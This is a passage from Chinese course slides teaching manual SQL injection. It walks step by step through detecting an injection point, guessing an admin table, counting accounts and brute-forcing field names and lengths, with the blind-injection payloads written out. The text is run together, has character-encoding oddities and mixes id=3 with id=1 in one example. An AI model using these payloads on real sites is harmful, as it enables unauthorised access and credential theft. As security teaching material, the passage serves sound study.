語句構(gòu)造？12348.3任務(wù)分析任務(wù)8-2SQL注入攻擊 手工注入，遵循SQL語句規(guī)則，構(gòu)建特殊的輸入作為參數(shù)傳給Web應(yīng)用程序，通過執(zhí)行SQL語句進(jìn)而執(zhí)行攻擊者的操作。為了讓用戶了解不同數(shù)據(jù)庫（MySQL、Access、SqlServer、SQLite、MongoDB、Db2、PostgreSQL、Sybase、Oracle）的結(jié)構(gòu)，掌握利用工具運(yùn)行測試的原理，深刻明白SQL注入漏洞的形成根源，初接觸SQL注入或一般基礎(chǔ)者更適合于使用手工注入。注入過程：數(shù)據(jù)庫執(zhí)行的語句，是頁面提交至服務(wù)器應(yīng)用程序，應(yīng)用程序獲取id的值，然后把值拼接到查詢語句中，在到數(shù)據(jù)庫中查詢，通過程序解析后，把結(jié)果返回在頁面上。子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 通常情況下，手工注入構(gòu)造語句原理如下。步驟1：判斷有無注入點(diǎn)如查詢Table中id號為3的記錄，其SQL語句為select*fromTablewhereid=3。如果ID=3的記錄確實(shí)存在，則應(yīng)該返回正常的值；如果不存在，則返回錯誤的提示信息。本查詢是利用了and邏輯結(jié)構(gòu)的運(yùn)行結(jié)果。當(dāng)and前后的條件都為真時結(jié)果為真，任何1個條件為假其運(yùn)行結(jié)果都為假。（1）and1=1其完整語句為select*fromTablewhereid=1and1=1，只要id=3的頁面確實(shí)存在，整個查詢結(jié)果就為真，會返回正常的頁面。（2）and1=2其完整語句為select*fromTablewhereid=1and1=2，不管id=3的頁面是不是存在，整個查詢結(jié)果都會為假，則頁面會出錯。從上可知構(gòu)造的語句可以被正常執(zhí)行，可以注入。子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步驟2：猜解表名根據(jù)命名習(xí)慣，表的命名一般是adminadminuseruserpasspassword等等。and0<>(selectcount(*)from*)如判斷是否存在admin這張表就可以將前面的語句修改為and0<>(selectcount(*)fromadmin)，能正確執(zhí)行，就說明存在admin表；如果不能執(zhí)行則換能想到的表名。子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步驟3：猜賬號數(shù)目如果遇到0<，1<返回錯誤頁面，說明帳號數(shù)目就是1個（1）and0<(selectcount(*)fromadmin)返回正確頁面，說明存在賬號（2）and1<(selectcount(*)fromadmin)返回錯誤頁面and1=(selectcount(*)fromadmin)正確，則說明有1個賬號步驟4：猜解字段名稱在len()括號里面加上想到的字段名稱。and1=(selectcount(*)fromadminwherelen(*)>0)--and1=(selectcount(*)fromadminwherelen(用戶字段名稱name)>0)and1=(selectcount(*)fromadminwherelen(_blank>密碼字段名稱password)>0)子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步驟5：猜解各個字段的長度猜解長度就是把>0變換直到返回正確頁面為止。and1=(selectcount(*)fromadminwherelen(*)>0)and1=(selectcount(*)fromadminwherelen(name)>6)錯誤and1=(selectcount(*)fromadminwherelen(name)>5)正確長度是6and1=(selectcount(*)fromadminwherelen(name)=6)正確and1=(selectcount(*)fromadminwherelen(password)>11)正確and1=(selectcount(*)fromadminwherelen(password)>12)錯誤長度是12and1=(selectcount(*)fromadminwherelen(password)=12)正確子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步